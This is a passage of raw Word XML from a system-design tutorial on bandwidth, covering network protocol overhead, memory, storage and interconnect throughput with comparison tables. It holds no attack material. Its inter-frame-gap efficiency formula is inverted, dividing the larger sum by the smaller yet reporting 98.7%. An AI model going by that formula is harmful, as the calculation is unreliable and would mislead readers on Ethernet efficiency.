        <w:t> Ethernet frame headers (14 bytes), IP headers (20 bytes), TCP headers (20 bytes), CRC (4 bytes). For a 1500-byte frame, ~58 bytes is overhead → ~96% efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE4A91E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inter-frame gap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Ethernet requires 12 bytes of idle time + 8 bytes of preamble between frames. With 1500-byte frames: (1500 + 58 + 20) / (1500 + 58) ≈ 98.7% efficiency including IFG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4138D411" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP/TLS overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Acknowledgments, retransmissions, TLS record headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C66CB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application protocol overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> HTTP headers, JSON formatting, XML bloat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7052B0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Effective application throughput on a "1 Gbps" link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620F4B8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3958F4F6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Raw Ethernet:          1,000 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA4B19" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>After L2 overhead:      962 Mbps (frames + IFG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFCDBC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>After IP/TCP overhead:  940 Mbps (headers on each packet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E45BFF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>After TLS:             ~930 Mbps (record headers + MAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA100B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>After HTTP/JSON:        700–900 Mbps (depends on payload efficiency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3637A1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>After application logic: 500–800 Mbps (serialization, compression, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E01202F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Memory Bandwidth — The CPU-RAM Bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C9F49" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> The rate at which data can be read from or written to main memory (RAM).</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07"/>
        <w:gridCol w:w="2673"/>
        <w:gridCol w:w="2882"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="532ECD4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B7A928" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technology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E14443" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Bandwidth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04AB5C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="59E587A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85E300" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>DDR4-3200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625868" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>25.6 GB/s per channel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E66CB8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>4 channels = 102.4 GB/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="55FE6CD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916C47" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>DDR5-5600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F3C77E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>44.8 GB/s per channel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39159A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>4 channels = 179.2 GB/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="1B9CA5A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A26147" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:lastRenderedPageBreak/>
              <w:t>HBM2e (GPU)</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7AAD39" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>460 GB/s per stack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5421AD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>4 stacks = 1.84 TB/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="2A1A867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8B5C78" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>L1 cache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6743E7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1–5 TB/s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A4ECBB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Per core</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="460B388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A67154" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>L2 cache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569063" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>500 GB/s–1 TB/s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EDFCE1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Per core</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="7A492D9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8559F5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>L3 cache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D8D297" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>200–500 GB/s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13A261" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Shared</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6465F4B5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why memory bandwidth matters for system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3669A649" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In-memory databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (Redis, Memcached): Throughput is limited by memory bandwidth when the working set exceeds cache size. A single Redis instance on DDR4 maxes out at ~10–25 GB/s of data movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D12E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analytics workloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (columnar scans): Scanning billions of rows is memory-bandwidth-bound, not CPU-bound. The CPU can process data faster than RAM can deliver it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A7C8A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NUMA effects:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> In multi-socket servers, accessing "remote" memory (on another CPU's memory controller) has ~50% less bandwidth and 2x latency compared to local memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C386716" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Storage Bandwidth (I/O Bandwidth)</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25"/>
        <w:gridCol w:w="1986"/>
        <w:gridCol w:w="2010"/>
        <w:gridCol w:w="3529"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="02AB91C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D7B698" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Storage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84CBF2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sequential Read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90DDE1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sequential Write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9CC7D8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Random 4K Read</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5F05853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04066A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>HDD (7200 RPM)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76CDCD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>150–200 MB/s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C21245" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>150–200 MB/s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43C5BB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>0.5–1 MB/s (100–200 IOPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5264F18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D4EA4B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>SATA SSD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2D327D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>550 MB/s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F6A6F9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>520 MB/s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7075D4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>~200 MB/s (50K IOPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5BF7B19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937629" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>NVMe SSD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28A9DC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>3–7 GB/s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0921C9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>2–5 GB/s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61CCB8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>~2 GB/s (500K–1M IOPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="10938D4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64ECB5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Intel Optane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D9C972" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>2.5 GB/s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12179E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>2.2 GB/s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20F63E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>~2.5 GB/s (500K IOPS, ultra-low latency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="0C30197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A0A894" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:lastRenderedPageBreak/>
              <w:t>RAM disk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6FF4EE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>10+ GB/s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142D06" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>10+ GB/s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0FFB7E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Same as sequential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C4CE9E1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why storage bandwidth matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB530CF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database write throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> WAL writes are sequential → SSD sequential write bandwidth is the limit. An NVMe SSD at 3 GB/s can write WAL entries for millions of transactions per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1E4765" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backup/restore speed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Restoring a 10 TB database from NVMe (7 GB/s) takes ~24 minutes. From HDD (200 MB/s) takes ~14 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A5D17E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log ingestion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A logging pipeline writing 100 GB/hour needs ~28 MB/s sustained write bandwidth. Easily handled by any SSD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B62CCE0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 Bus/Interconnect Bandwidth</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313"/>
        <w:gridCol w:w="2342"/>
        <w:gridCol w:w="4695"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="7C7B243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5AA21D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Interconnect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0A0C5F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Bandwidth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89908D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5CBC3D9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2A797A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>PCIe 4.0 x16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830913" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>32 GB/s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FFE9E2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>GPU ↔ CPU, NVMe ↔ CPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="7B817E3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94D148" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>PCIe 5.0 x16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2D8CCD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>64 GB/s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7F5F8D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Latest GPUs, high-speed storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="6606587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D3BD3A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>NVLink (GPU-GPU)</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0F2B38" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>600 GB/s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F9D252" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>AI/ML multi-GPU training</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5122581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7DEFA2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>InfiniBand HDR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5ED81E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>200 Gbps (25 GB/s)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95CE91" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>HPC clusters, low-latency networking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="4A396BB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99FB71" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
